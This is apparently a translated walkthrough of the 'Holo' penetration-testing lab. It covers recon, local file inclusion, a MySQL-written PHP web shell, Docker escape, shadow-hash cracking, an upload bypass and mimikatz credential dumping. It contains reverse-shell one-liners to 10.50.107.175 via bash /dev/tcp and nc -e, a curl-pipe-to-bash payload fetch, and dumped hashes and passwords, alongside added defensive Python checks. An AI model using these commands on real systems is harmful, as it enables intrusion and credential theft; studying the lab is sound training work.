holo
[[Target machine] holo - AD domain penetration & web_lab (1) - external penetration - internal penetration] https://www.bilibili.com/video/BV13G4y1j7xF/?share_source=copy_web&vd_source=21485fc93994c5f47b14e02ed42e0e49
┌──(zacarx㉿zacarx)-[~]
└─$ nmap -T4 10.200.110.33 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-26 16:04 CST
Nmap scan report for 10.200.110.33 (10.200.110.33)
Host is up (0.19s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 41:38:8d:8a:ee:8a:4b:6c:f9:f0:a3:79:e8:96:3b:36 (RSA)
| 256 63:66:d6:68:60:67:9a:36:ae:d1:99:b7:8b:66:4e:6d (ECDSA)
|_ 256 87:00:d8:b1:c7:63:5e:9c:30:8c:3d:e1:d0:5a:79:63 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-generator: WordPress 5.5.3
| http-robots.txt: 21 disallowed entries (15 shown)
| /var/www/wordpress/index.php
| /var/www/wordpress/readme.html /var/www/wordpress/wp-activate.php
| /var/www/wordpress/wp-blog-header.php /var/www/wordpress/wp-config.php
| /var/www/wordpress/wp-content /var/www/wordpress/wp-includes
| /var/www/wordpress/wp-load.php /var/www/wordpress/wp-mail.php
| /var/www/wordpress/wp-signup.php /var/www/wordpress/xmlrpc.php
| /var/www/wordpress/license.txt /var/www/wordpress/upgrade
|_/var/www/wordpress/wp-admin /var/www/wordpress/wp-comments-post.php
|_http-title: holo.live
109/tcp filtered pop2
465/tcp filtered smtps
720/tcp filtered unknown
911/tcp filtered xact-backup
999/tcp filtered garcon
1110/tcp filtered nfsd-status
1259/tcp filtered opennl-voice
1524/tcp filtered ingreslock
2222/tcp filtered EtherNetIP-1
5959/tcp filtered unknown
5960/tcp filtered unknown
6003/tcp filtered X11:3
6668/tcp filtered irc
6881/tcp filtered bittorrent-tracker
8093/tcp filtered unknown
14000/tcp filtered scotty-ft
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(zacarx㉿zacarx)-[~]
└─$ wpscan --url "http://10.200.110.33" --enumerate u
....
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.29 (Ubuntu)
| - X-UA-Compatible: IE=edge
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.200.110.33/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.200.110.33/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.200.110.33/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.200.110.33/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
| Found By: Emoji Settings (Passive Detection)
| - http://10.200.110.33/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.200.110.33/, Match: 'WordPress 5.5.3'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] admin
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.200.110.33/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
┌──(zacarx㉿zacarx)-[~/SecLists/Discovery/DNS]
└─$ gobuster vhost -u holo.live -w ./subdomains-top1million-5000.txt -t 1
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://holo.live
[+] Method: GET
[+] Threads: 1
[+] Wordlist: ./subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/12/26 16:31:44 Starting gobuster in VHOST enumeration mode
===============================================================
...
Because of the network there were a lot of 432 errors, so I will not paste them.
In the end the dev and admin subdomains were found.
We ran directory brute-forcing against these three domains
and got:
www.holo.live/robots.txt
dev.holo.live/about.php
dev.holo.live/img.php
dev.holo.live/index.php
User-agent: *
Disallow: /var/www/admin/db.php
Disallow: /var/www/admin/dashboard.php
Disallow: /var/www/admin/supersecretdir/creds.txt
Later I found that dev.holo.live has a local file inclusion vulnerability.
Let's try the payload we used: http://dev.holo.live/img.php?file=../../../etc/passwd
Result:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
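The request above works because img.php hands the file parameter to an include without confining it to a directory. Added example, my own code rather than anything from the lab or this post: a Python resolver that keeps a requested name inside an assumed base directory (IMAGE_DIR is a guess at the layout, not the lab's real path) and a detector that flags traversal attempts, including double-encoded ones, in Apache access-log lines. The log lines are constructed to match the request shown.

```python
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Assumed image directory for dev.holo.live; the lab's real layout is not known.
IMAGE_DIR = "/var/www/dev/images"


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so that ..%252f (double encoding) is seen as ../."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_image_path(requested: str, base_dir: str = IMAGE_DIR) -> Optional[str]:
    """Return the absolute path for a user-supplied name if it stays inside base_dir,
    otherwise None. This is the check img.php lacks: the name is joined to the base
    directory and normalised, and anything that escapes the base is refused."""
    name = fully_decode(requested)
    if "\x00" in name:                       # NUL truncation tricks against C-level opens
        return None
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, name))
    if candidate == base or not candidate.startswith(base + "/"):
        return None                          # escaped the directory, or asked for the dir itself
    return candidate


# Apache combined log format, only the fields needed here.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL = re.compile(r"\.\.[/\\]")


def find_traversal_attempts(log_lines: List[str]) -> List[Tuple[str, str, int]]:
    """Flag requests whose (decoded) path contains a parent-directory step."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = m.group("path")
        if TRAVERSAL.search(fully_decode(path)):
            hits.append((m.group("ip"), path, int(m.group("status"))))
    return hits


# Constructed access-log lines modelled on the request in the write-up; not real server logs.
SAMPLE_LOG = [
    '10.50.107.175 - - [26/Dec/2022:16:40:01 +0000] "GET /img.php?file=hololive.jpg HTTP/1.1" 200 5120 "-" "curl/7.81.0"',
    '10.50.107.175 - - [26/Dec/2022:16:40:05 +0000] "GET /img.php?file=../../../etc/passwd HTTP/1.1" 200 1803 "-" "curl/7.81.0"',
    '10.50.107.175 - - [26/Dec/2022:16:40:09 +0000] "GET /img.php?file=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1803 "-" "curl/7.81.0"',
    '10.50.107.175 - - [26/Dec/2022:16:40:12 +0000] "GET /about.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for requested in ("hololive.jpg", "../../../etc/passwd", "/etc/passwd"):
        print(f"{requested!r:28} -> {safe_image_path(requested)}")
    for ip, path, status in find_traversal_attempts(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {path} (HTTP {status})")
```

The resolver refuses absolute paths and anything that normalises outside the base; the detector decodes before matching because the web server logs the request exactly as it was sent.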
Using this vulnerability we can retrieve the admin credentials:
know you forget things, so I'm leaving this note for you:
admin:DBManagerLogin!
- gurag <3
In the source view of the admin page we found a ?cmd= command execution vulnerability,
so we use cmd to set up a reverse shell.
Recommended: bash -c 'bash -i >& /dev/tcp/10.50.107.175/8888 0>&1'
Then we find the db_config file:
<?php
define('DB_SRV', '192.168.100.1');
define('DB_PASSWD', "!123SecureAdminDashboard321!");
define('DB_USER', 'admin');
define('DB_NAME', 'DashboardDB');
$connection = mysqli_connect(DB_SRV, DB_USER, DB_PASSWD, DB_NAME);
if($connection == false){
die("Error: Connection to Database could not be made." . mysqli_connect_error());
}
?>
find / -type f -name "*.dockerenv" -ls 2>/dev/null
This tells us we are inside a container and need to escape.
python3 -c 'import pty;pty.spawn("/bin/bash")'
We connect to MySQL:
mysql -u admin -p -h 192.168.100.1
There was no output.
So once again I recommend pentestmonkey:
Reverse Shell Cheat Sheet | pentestmonkey
Later I found that
python3 -c 'import pty; pty.spawn("/bin/bash")'
works,
but
python -c 'import pty; pty.spawn("/bin/bash")'
does not.
Lesson learned, tearfully.
Finally, in the database we find:
mysql> select * from users;
select * from users;
+----------+-----------------+
| username | password |
+----------+-----------------+
| admin | DBManagerLogin! |
| gurag | AAAA |
+----------+-----------------+
2 rows in set (0.00 sec)
Then we use the database to escalate our access.
CREATE TABLE hax(Code varchar(255));
INSERT INTO hax (Code) value ('<?php $cmd=$_GET[\"cmd\"]\;system($cmd)\;?>');
mysql> SELECT * FROM hax;
SELECT * FROM hax;
+-----------------------------------------+
| Code |
+-----------------------------------------+
| <?php $cmd=$_GET["cmd"];system($cmd);?> |
+-----------------------------------------+
1 row in set (0.00 sec)
We check the secure_file_priv variable:
mysql> SHOW VARIABLES LIKE "secure_file_priv";
+------------------+----------------+
| Variable_name | Value |
+------------------+----------------+
| secure_file_priv | /var/www/html/ |
+------------------+----------------+
1 row in set (0.00 sec)
Therefore we write it out:
SELECT * FROM hax INTO OUTFILE '/var/www/html/hax.php';
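The OUTFILE write succeeds because secure_file_priv points at the document root, so MySQL is allowed to drop a file exactly where the web server will execute it. Added example (my code, not from the lab): a Python hardening check that classifies a secure_file_priv value against the web roots, and a parser for the SHOW VARIABLES table so the check can run on pasted output. The function names and the web-root list are mine.

```python
import posixpath
from typing import Dict, List, Optional


def _norm(path: str) -> str:
    return posixpath.normpath(path) if path else path


def _overlaps(a: str, b: str) -> bool:
    """True if one directory equals or contains the other."""
    a, b = _norm(a), _norm(b)
    return a == b or a.startswith(b + "/") or b.startswith(a + "/")


def assess_secure_file_priv(value: Optional[str], web_roots: List[str]) -> Dict[str, str]:
    """Classify a secure_file_priv setting.

    value: None   -> NULL, LOAD DATA INFILE / SELECT ... INTO OUTFILE are disabled
           ""     -> no restriction, files may be written anywhere mysqld can write
           "/dir" -> imports and exports are confined to that directory
    web_roots: directories the web server serves (and, for PHP, executes from)
    """
    if value is None:
        return {"risk": "none", "reason": "secure_file_priv is NULL: file import/export disabled"}
    if value == "":
        return {"risk": "critical",
                "reason": "secure_file_priv is empty: INTO OUTFILE may write anywhere mysqld can"}
    for root in web_roots:
        if _overlaps(value, root):
            return {"risk": "high",
                    "reason": f"secure_file_priv {value} overlaps web root {root}: "
                              f"an exported file is served by the web server"}
    # Debian/Ubuntu packages ship /var/lib/mysql-files/ for this purpose.
    return {"risk": "low", "reason": f"exports confined to {value}, which is not served by the web server"}


def parse_show_variables(table: str) -> Dict[str, Optional[str]]:
    """Parse the ASCII table printed by SHOW VARIABLES. 'NULL' becomes None, blank stays ''."""
    variables: Dict[str, Optional[str]] = {}
    for line in table.splitlines():
        if not line.startswith("|"):
            continue                              # border lines
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 2 or cells[0] == "Variable_name":
            continue                              # header row
        name, raw = cells
        variables[name] = None if raw == "NULL" else raw
    return variables


def audit_from_show_variables(table: str, web_roots: List[str]) -> Dict[str, str]:
    variables = parse_show_variables(table)
    if "secure_file_priv" not in variables:
        return {"risk": "unknown", "reason": "secure_file_priv not present in output"}
    return assess_secure_file_priv(variables["secure_file_priv"], web_roots)


# The table as it appears in the write-up, reproduced here as a constructed string.
LAB_OUTPUT = """\
+------------------+----------------+
| Variable_name    | Value          |
+------------------+----------------+
| secure_file_priv | /var/www/html/ |
+------------------+----------------+
"""

if __name__ == "__main__":
    print(audit_from_show_variables(LAB_OUTPUT, ["/var/www/html", "/var/www/wordpress"]))
```

The fix the check points at is a dedicated export directory outside every web root (or NULL if the server never needs file import/export), set in my.cnf as secure_file_priv and enforced by a restart, since the variable is read-only at runtime.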
www-data@14c75992b944:/tmp/babbadeckl$ for i in {1..10000};do 2>/dev/null > /dev/tcp/192.168.100.1/$i && echo Port $i open;done
Port 22 open
Port 80 open
Port 3306 open
Port 8080 open
Check that it works:
curl 192.168.100.1:8080/hax.php?cmd=id
curl http://192.168.100.1:8080/hax.php?cmd=nc+-e+/bin/sh+10.50.107.175+9999
This method doesn't seem to work anymore,
so let's try another approach.
find / -perm -u=s -type f 2>/dev/null
On Kali we create 1.sh
with the contents:
#!/bin/bash
bash -i >& /dev/tcp/10.50.107.175/999 0>&1
Then start an HTTP server
and set up an msf listener:
msfconsole
use multi/handler
set LHOST tun0
set LPORT 53
run
Then in the shell we enter:
curl 192.168.100.1:8080/hax.php?cmd=curl%20http%3A%2F%2F10.50.107.175%3A80%2F1.sh%7Cbash%20%26
Ctrl+Z to leave the session (background it).
search post/multi/manage/shell_to_meterpreter
use 0
set session 1
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh >> linpeas.sh
chmod +x linpeas.sh
upload linpeas.sh
shell
chmod 777 linpeas.sh
./linpeas.sh >> linpeas.txt
find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/docker
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/mount
/usr/bin/chsh
docker looks a bit suspicious, so we search whether it can be exploited.
Found it!
So we enter:
/usr/bin/docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Error:
Unable to find image 'alpine:latest' locally
We run docker ps -a
to get an image ID and substitute it:
python3 -c 'import pty; pty.spawn("/bin/bash")'
/usr/bin/docker run -v /:/mnt --rm -it cb1b741122e8 chroot /mnt sh
But we are still in the container,
so we run:
docker image ls
and find the ubuntu image:
/usr/bin/docker run -v /:/mnt --rm -it ubuntu:18.04 chroot /mnt sh
We cat the /etc/shadow file
and get:
# cat /etc/shadow
cat /etc/shadow
root:$6$TvYo6Q8EXPuYD8w0$Yc.Ufe3ffMwRJLNroJuMvf5/Telga69RdVEvgWBC.FN5rs9vO0NeoKex4jIaxCyWNPTDtYfxWn.EM4OLxjndR1:18605:0:99999:7:::
daemon:*:18512:0:99999:7:::
bin:*:18512:0:99999:7:::
sys:*:18512:0:99999:7:::
sync:*:18512:0:99999:7:::
games:*:18512:0:99999:7:::
man:*:18512:0:99999:7:::
lp:*:18512:0:99999:7:::
mail:*:18512:0:99999:7:::
news:*:18512:0:99999:7:::
uucp:*:18512:0:99999:7:::
proxy:*:18512:0:99999:7:::
www-data:*:18512:0:99999:7:::
backup:*:18512:0:99999:7:::
list:*:18512:0:99999:7:::
irc:*:18512:0:99999:7:::
gnats:*:18512:0:99999:7:::
nobody:*:18512:0:99999:7:::
systemd-network:*:18512:0:99999:7:::
systemd-resolve:*:18512:0:99999:7:::
systemd-timesync:*:18512:0:99999:7:::
messagebus:*:18512:0:99999:7:::
syslog:*:18512:0:99999:7:::
_apt:*:18512:0:99999:7:::
tss:*:18512:0:99999:7:::
uuidd:*:18512:0:99999:7:::
tcpdump:*:18512:0:99999:7:::
sshd:*:18512:0:99999:7:::
landscape:*:18512:0:99999:7:::
pollinate:*:18512:0:99999:7:::
ec2-instance-connect:!:18512:0:99999:7:::
systemd-coredump:!!:18566::::::
ubuntu:!$6$6/mlN/Q.1gopcuhc$7ymOCjV3RETFUl6GaNbau9MdEGS6NgeXLM.CDcuS5gNj2oIQLpRLzxFuAwG0dGcLk1NX70EVzUUKyUQOezaf0.:18601:0:99999:7:::
lxd:!:18566::::::
mysql:!:18566:0:99999:7:::
dnsmasq:*:18566:0:99999:7:::
linux-admin:$6$Zs4KmlUsMiwVLy2y$V8S5G3q7tpBMZip8Iv/H6i5ctHVFf6.fS.HXBw9Kyv96Qbc2ZHzHlYHkaHm8A5toyMA3J53JU.dc6ZCjRxhjV1:18570:0:99999:7:::
Then we crack it with hashcat:
hashcat -a 0 -m 1800 p.txt /usr/share/wordlists/rockyou.txt
Password obtained: linuxrulez
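hashcat mode 1800 is sha512crypt, the $6$ format in the dump above, and the dump also shows two other states worth noticing: ubuntu has a hash but is locked with a leading !, and most service accounts have * and no hash at all. Added example (not from the post): a Python audit of /etc/shadow lines that reports, per account, whether a hash is stored, whether the account is locked, which algorithm is used, and whether the password never expires. The sample lines are constructed in the shape of the dump, with the hash bodies shortened and not real.

```python
from typing import Dict, List

# Prefix of the hash field -> algorithm name, as used by crypt(3) / libxcrypt.
HASH_IDS = {
    "$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt",
    "$y$": "yescrypt", "$gy$": "gost-yescrypt",
}
WEAK_ALGORITHMS = {"md5crypt", "descrypt"}


def classify_hash(field: str) -> Dict[str, object]:
    """Interpret the second field of a shadow entry."""
    if field == "":
        return {"state": "empty", "locked": False, "algorithm": None, "hash_present": False}
    locked = field.startswith("!")
    body = field.lstrip("!")
    if body in ("", "*", "*LK*", "x"):
        # '!' / '!!' (locked, never set) and '*' (no password login) carry no hash
        return {"state": "no-password", "locked": True, "algorithm": None, "hash_present": False}
    algorithm = "descrypt"                      # traditional 13-char DES if there is no $id$ prefix
    for prefix, name in HASH_IDS.items():
        if body.startswith(prefix):
            algorithm = name
            break
    return {"state": "hashed", "locked": locked, "algorithm": algorithm, "hash_present": True}


def audit_shadow(lines: List[str]) -> Dict[str, Dict[str, object]]:
    """One record per account: lock state, algorithm, expiry and whether a hash is stored."""
    report: Dict[str, Dict[str, object]] = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 5:
            continue                            # malformed line: skip rather than guess
        name, pw, _lastchg, _min_days, max_days = fields[:5]
        entry = classify_hash(pw)
        entry["never_expires"] = max_days in ("", "99999")
        entry["weak_algorithm"] = entry["algorithm"] in WEAK_ALGORITHMS
        # A locked account whose hash is still stored is offline-crackable if the file leaks.
        entry["crackable_if_leaked"] = entry["hash_present"]
        report[name] = entry
    return report


def accounts_needing_attention(report: Dict[str, Dict[str, object]]) -> List[str]:
    """Accounts with a live (unlocked) hash that never expires or uses a weak algorithm."""
    return sorted(n for n, e in report.items()
                  if e["hash_present"] and not e["locked"]
                  and (e["never_expires"] or e["weak_algorithm"]))


# Constructed lines in the shape of the dump above; hash bodies shortened and not real.
SAMPLE_SHADOW = [
    "root:$6$TvYo6Q8E$shortenedhashbody:18605:0:99999:7:::",
    "daemon:*:18512:0:99999:7:::",
    "ubuntu:!$6$6/mlN/Q.$shortenedhashbody:18601:0:99999:7:::",
    "lxd:!:18566::::::",
    "linux-admin:$6$Zs4KmlUs$shortenedhashbody:18570:0:99999:7:::",
    "legacyapp:$1$abc123$shortenedhashbody:18000:0:90:7:::",
]

if __name__ == "__main__":
    report = audit_shadow(SAMPLE_SHADOW)
    for name, entry in report.items():
        print(f"{name:12} {entry['state']:12} locked={entry['locked']!s:5} "
              f"alg={entry['algorithm']} never_expires={entry['never_expires']}")
    print("needs attention:", accounts_needing_attention(report))
```

The point for a defender is that the dump was crackable at all: a strong algorithm does not help when the password is in rockyou, so the report is a prompt for password rotation and expiry, and for keeping the file out of reach in the first place.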
sshuttle -r linux-admin@10.200.111.33 10.200.111.0/24
ssh-keygen -t rsa
Generate a key pair
and add our public key to /root/.ssh/authorized_keys.
nmap doesn't seem to work from our side,
so
we SSH into 10.200.110.33 and scan from there:
root@ip-10-200-110-33:~# nmap -sP 10.200.110.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-28 06:25 UTC
Nmap scan report for ip-10-200-110-1.eu-west-1.compute.internal (10.200.110.1)
Host is up (0.00012s latency).
MAC Address: 02:27:12:F2:56:27 (Unknown)
Nmap scan report for ip-10-200-110-30.eu-west-1.compute.internal (10.200.110.30)
Host is up (0.0011s latency).
MAC Address: 02:7B:52:BC:1E:D3 (Unknown)
Nmap scan report for ip-10-200-110-31.eu-west-1.compute.internal (10.200.110.31)
Host is up (0.00041s latency).
MAC Address: 02:2D:A4:13:01:2F (Unknown)
Nmap scan report for ip-10-200-110-32.eu-west-1.compute.internal (10.200.110.32)
Host is up (0.00032s latency).
MAC Address: 02:3E:0F:BB:96:B3 (Unknown)
Nmap scan report for ip-10-200-110-35.eu-west-1.compute.internal (10.200.110.35)
Host is up (0.0011s latency).
MAC Address: 02:90:CD:DE:93:AD (Unknown)
Nmap scan report for ip-10-200-110-250.eu-west-1.compute.internal (10.200.110.250)
Host is up (0.00059s latency).
MAC Address: 02:FC:B2:BC:42:65 (Unknown)
Nmap scan report for ip-10-200-110-33.eu-west-1.compute.internal (10.200.110.33)
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 1.70 seconds
Oh, we find that
10.200.110.31
has a login page.
The page has a password reset, which we bypass easily through a logic flaw.
Then we see a file upload vulnerability,
something covered before.
We simply disable JavaScript
and upload without trouble.
Note that my first attempt failed
because I used the Linux PHP reverse-shell file.
Then we get a shell.
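Disabling JavaScript defeated the upload check because the check ran only in the browser. Added example, my own code and not the lab's: the server-side validation a practitioner would put behind that form, written in Python, with an extension allowlist, magic-byte verification against the declared type, rejection of path components and double extensions, a script-marker heuristic, and a server-chosen filename. The sample files are constructed stubs.

```python
import posixpath
import secrets
from typing import Tuple

# Allowed extensions and the magic bytes each file type must start with.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024
# Markers of embedded server-side code. This is a heuristic only; re-encoding the image
# with an image library is the robust way to strip payloads hidden in metadata.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def validate_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Server-side checks for an image upload. Returns (accepted, reason)."""
    name = filename.replace("\\", "/")
    if posixpath.basename(name) != name or name in ("", ".", ".."):
        return False, "file name contains a path component"
    if "\x00" in name:
        return False, "NUL byte in file name"
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension is required (double extensions refused)"
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} is not allowed"
    if len(content) > MAX_BYTES:
        return False, "file too large"
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match the declared image type"
    if any(marker in content for marker in SCRIPT_MARKERS):
        return False, "embedded script marker found"
    return True, "ok"


def stored_name(original: str) -> str:
    """Server-chosen name: random token plus the validated extension, never the client's name."""
    ext = original.lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample uploads; the PNG is just a header plus filler, not a real picture.
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
PHP_STUB = b"<?php system($_GET['cmd']); ?>"

if __name__ == "__main__":
    for fname, data in (("avatar.png", PNG_STUB), ("shell.php", PHP_STUB),
                        ("shell.php.png", PNG_STUB), ("avatar.png", PHP_STUB),
                        ("avatar.png", PNG_STUB + PHP_STUB), ("../avatar.png", PNG_STUB)):
        print(f"{fname:16} -> {validate_upload(fname, data)}")
```

Two things the browser-side check could never provide: the content is inspected, not just the name, and the stored name is chosen by the server, so a client can neither pick a .php name nor place the file outside the upload directory.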
Download mimikatz
Download mimikatz from SourceForge.net
then upload it:
powershell.exe Invoke-WebRequest http://10.50.107.175/mimikatz.exe -outfile mimikatz.exe
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit
Output:
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
668 {0;000003e7} 1 D 21351 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 2076472 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 2100336 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 306323 (00000000:0004ac93)
Session : Interactive from 1
User Name : watamet
Domain : HOLOLIVE
Logon Server : DC-SRV01
Logon Time : 12/28/2022 5:34:26 AM
SID : S-1-5-21-471847105-3603022926-1728018720-1132
msv :
[00000003] Primary
* Username : watamet
!!!!!
* Domain : HOLOLIVE
* NTLM : d8d41e6cf762a8c77776a1843d4141c9
!!!!
* SHA1 : 7701207008976fdd6c6be9991574e2480853312d
* DPAPI : 300d9ad961f6f680c6904ac6d0f17fd0
tspkg :
wdigest :
* Username : watamet
* Domain : HOLOLIVE
* Password : (null)
kerberos :
!!!
* Username : watamet
* Domain : HOLO.LIVE
* Password : Nothingtoworry!
!!!!
ssp :
credman :
Authentication Id : 0 ; 45785 (00000000:0000b2d9)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 12/28/2022 5:34:05 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : S-SRV01$
* Domain : HOLOLIVE
* NTLM : 3179c8ec65934b8d33ac9ec2a9d93400
* SHA1 : fb4789d7ac8f1b2a46319fcb0ae10e616bd6a399
tspkg :
wdigest :
* Username : S-SRV01$
* Domain : HOLOLIVE
* Password : (null)
kerberos :
* Username : S-SRV01$
* Domain : holo.live
* Password : 9e 8e d8 e0 37 37 04 5f 38 08 bd 3e aa b5 41 58 87 d0 db 00 dd ce 62 58 8f ee aa 5c b8 0d 05 c5 34 a5 70 80 2d 50 8f 25 68 a8 23 dd 04 ea aa 5c a5 25 63 93 1b 06 c6 e2 f2 3f 6a 49 d5 ad a2 16 e4 df df 5e 36 aa 5f 6a ab 56 d1 c5 3a df 85 7f 80 79 8d 61 d0 35 d2 56 0a e4 c1 51 df fc f3 ab f3 a2 83 81 01 d9 b2 79 89 c5 0d d5 c7 ad 52 fc d4 db 59 fa 04 95 22 3f 5d 21 f3 b4 10 0f ec 0b 04 c4 7b d9 f8 b6 08 de 83 de 7a 3f 37 48 40 e2 31 fe 85 9d 9c 4c 90 8c 41 55 29 14 0d 67 6a c1 68 66 ff cc f9 bc 19 56 a9 4a b9 60 c9 05 aa 0f 5b 96 d5 1f d2 1f 02 52 37 a2 8d 5c 1e da fb 2c 27 20 f3 6b 76 a1 66 b4 d3 d5 f2 28 11 08 26 83 4a d6 a6 3a 62 86 02 53 ee d9 a6 4e 44 6d 93 e4 ac 10 28 ee ae 4c b8 ba 52 09 e2 dc 7e 40 fd ef
ssp :
credman :
Authentication Id : 0 ; 45707 (00000000:0000b28b)
Session : Interactive from 1
User Name : DWM-1
